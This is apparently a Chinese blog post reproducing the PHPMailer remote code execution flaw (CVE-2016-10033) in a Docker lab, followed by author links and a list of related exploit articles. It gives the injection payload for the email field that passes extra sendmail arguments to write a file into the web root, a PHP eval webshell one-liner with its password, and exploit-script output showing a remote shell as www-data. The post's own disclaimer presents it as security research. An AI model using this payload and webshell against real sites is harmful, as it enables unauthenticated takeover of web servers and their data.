​PHPMailer远程命令执行漏洞复现

一、漏洞简介

PHPMailer是PHP电子邮件创建及传输类,用于多个开源项目:WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla!等。

PHPMailer < 5.2.18版本存在安全漏洞,可使未经身份验证的远程攻击者在Web服务器用户上下文中执行任意代码,远程控制目标web应用。

二、影响版本:

PHPMailer<5.2.18

三、漏洞复现

Docker环境:

dockerrun --rm -it -p8080:80vulnerables/cve-2016-10033

拉去镜像启动环境:

http://192.168.1.107:8080/

http://192.168.1.107:8080/在name处随便输入比如“aaa”,在email处输入:​"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/a.php @aaa.com在message处输入一句话木马:​<?php@eval($_POST['thelostworld']);?>

上传完一句话木马后,页面会响应3-5分钟,响应时间较长

木马地址:http://192.168.1.107:8080/a.php 密码:thelostworld

虚拟终端:

使用脚本:

获取脚本后台回复“PHPMailer”获取脚本

➜  Desktop ./exploit.sh192.168.1.107:8080[+] CVE-2016-10033exploitbyopsxcq[+] Exploiting192.168.1.107:8080​​[+] Target exploited, acessing shell at http://192.168.1.107:8080/backdoor.php[+] Checkingifthe backdoor was createdontarget system[+] Backdoor.php foundonremote system[+] Running whoamiwww-dataRemoteShell> [+] Running ​​RemoteShell> id[+] Running iduid=33(www-data) gid=33(www-data) groups=33(www-data)

访问木马地址:

http://192.168.1.107:8080/backdoor.php

参考:

https://www.cnblogs.com/Hi-blog/p/7812008.html

https://www.exploit-db.com/exploits/40968

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

PHPMailer远程命令执行漏洞复现相关推荐

  1. 华为路由器远程命令执行漏洞复现(CVE-2017-17215)

    华为路由器远程命令执行漏洞复现(CVE-2017-17215) 漏洞内容 这个漏洞算是比较老的一种漏洞了,但是具有一定的学习价值. CheckPoint报告华为HG532路由器产品存在远程命令执行漏洞 ...

  2. 开源堡垒机JumpServer远程命令执行漏洞复现

    声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统.JumpServer 使用Python ...

  3. Dlink路由器 CNVD-2018-01084 远程命令执行漏洞 复现分析

    Dlink路由器 CNVD-2018-01084复现分析 0x01 背景介绍 D-Link DIR 615/645/815路由器1.03及之前的固件版本存在远程命令执行漏洞.该漏洞是由于service ...

  4. Apache[多后缀文件名解析漏洞+换行解析漏洞+SSI远程命令执行漏洞]复现

    目录 一.多后缀文件解析漏洞 二.Apache换行解析漏洞(CVE-2017-15715) 三.Apache SSI 远程命令执行漏洞

  5. HFS远程命令执行漏洞复现

    漏洞程序下载地址:Http File Server 这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题.再Window ...

  6. thinkphp5.*远程命令执行漏洞复现

    ThinkPHP5漏洞复现: 测试版本:ThinkPHP_full_v5.0.22 远程执行命令漏洞: 首先工具检测漏洞是否存在: 远程执行命令,wireshark抓包: 直接得到poc: http: ...

  7. O2OA RCE 远程命令执行漏洞复现(CVE-2022-22916)

    1.产品简介 O2OA是一款Java开源企业信息化建设平台 ,包括流程管理.门户管理.信息管理.数据管理和服务管理五大平台,可以极大程度上减化企业信息化建设成本和业务应用开发难度. 2.漏洞概述 O2 ...

  8. Google 0day远程命令执行漏洞复现

    目录 漏洞介绍 影响版本 漏洞复现 解决方案 漏洞介绍 国外安全研究员发布了 Google Chrome 浏览器远程代码执行 0Day 漏洞的 PoC,攻击者可以利用漏洞构造特制的页面,用户访问该页面 ...

  9. Apache Solr Velocity 注入远程命令执行漏洞复现 (CVE-2019-17558)

    漏洞描述 Solr是Apache Lucene项目的开源企业搜索平台. 其主要功能包括全文检索.命中标示.分面搜索.动态聚类.数据库集成,以及富文本的处理. 2019年10月30日,国外安全研究人员放 ...

最新文章

  1. 看张悟本神医现象有感
  2. UVa307 - Sticks(DFS+剪枝)
  3. kafka数据文件.log
  4. kylinH5框架之项目开发调试
  5. 邓公数据结构C++语言版学习笔记——二叉树
  6. 神经网络激活函数=生物转换器?
  7. Python知识点之Python面向对象
  8. python函数chr_python函数之chr(i)
  9. 如何让Toast响应点击事件等基础Android基础文章N篇
  10. linux shell 脚本实现:根据文件内容中的每行分隔符放入数组,根据规则打印日志并重新创建目录 备份文件
  11. 把服务器sql数据库导出excel文件,从sql中导出到excel表格数据-如何把SQLServer表数据导出为Excel文件...
  12. ECSHOP 商品详情页相关属性商品 由新到旧排序
  13. 计算机的硬件软件组成
  14. matlab与计量经济学,matlab与计量经济学
  15. 腾讯qlv格式转换mp4为何转换后只有音频
  16. 各进制转换成十进制的方法
  17. 运维工程师主要做什么_弱电工程IT运维工作到底是做什么的?
  18. 人体的矢状面,冠状面,以及水平面,你懂吗?
  19. 大话电脑(转自知乎Jeffersli)
  20. ac1900 linksys 恢复_AC1900路由器怎么恢复出厂设置?

热门文章

  1. 在linux下 用户的密码错误,linux中root用户密码错误如何解决
  2. (转)正则表达式中的点星问号 .*? 或点星加号 .*+ 是什么意思
  3. mysql 函数返回类型set_mysql自定义函数如何返回多个值
  4. Emoji-Chat emoji表情包发送及显示兼容web端、移动端
  5. 根据网络图片地址获取资源的字节流
  6. 十年电影票房数据爬取与分析 | 免费数据教程
  7. Remix-IDE安装开发环境与使用文档(Windows环境)
  8. 为什么在Visual Studio Code 中输入的汉字变成繁体字了?电脑上其他地方的输入是正常的
  9. 使用OpenCV实现一个文档自动扫描仪
  10. 如何使用ghost制作系统镜像